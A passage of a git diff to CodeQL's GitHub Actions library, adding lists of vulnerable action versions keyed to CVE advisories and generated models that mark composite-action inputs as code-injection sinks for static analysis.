["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"] + - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"] + - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"] + - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"] + - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"] + - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"] + - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"] + - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"] + - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"] + - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"] + - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"] + - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"] + - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"] + - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"] + - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"] + - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"] + - ["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"] + - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"] + - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"] + - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"] + - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"] + - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"] + - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"] + - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"] + - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"] + - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"] + - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"] + - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"] + - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"] + - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"] + - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"] + + # gradle/gradle-build-action + # https://github.com/advisories/GHSA-h3qr-39j9-4r5v + # CVE-2023-30853 + - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.2", "fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.0", "3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"] + - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"] + - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + + # rlespinasse/github-slug-action + # https://github.com/advisories/GHSA-6q4m-7476-932w + # CVE-2023-27581 + - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.1.0", "e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"] + + # Azure/setup-kubectl + # https://github.com/advisories/GHSA-p756-rfxh-x63h + # CVE-2023-23939 + - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"] + - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"] + - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"] + + # gajira-create + # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw + # CVE-2020-14188 + - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"] + + # hashicorp/vault-action + # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7 + # CVE-2021-32074 + - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"] + - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"] + - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"] + - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"] + - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"] + - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"] diff --git a/actions/ql/lib/ext/config/workflow_runtime_data.yml b/actions/ql/lib/ext/config/workflow_runtime_data.yml new file mode 100644 index 000000000000..f02a6bc20aa2 --- /dev/null +++ b/actions/ql/lib/ext/config/workflow_runtime_data.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: repositoryDataModel + data: [] + - addsTo: + pack: codeql/actions-all + extensible: workflowDataModel + data: [] diff --git a/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 000000000000..ba6dbbe91e62 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 000000000000..b3430655e014 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 000000000000..3c6e8718fb42 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 000000000000..fee02f3d3bde --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..c102a42d3ea8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 000000000000..77744b4ab474 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 000000000000..e9e6941e6343 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 000000000000..e0240360052b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 000000000000..cae561f77754 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 000000000000..18d893d4c53d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 000000000000..b40d68cc560b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 000000000000..9282d312fb8f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No 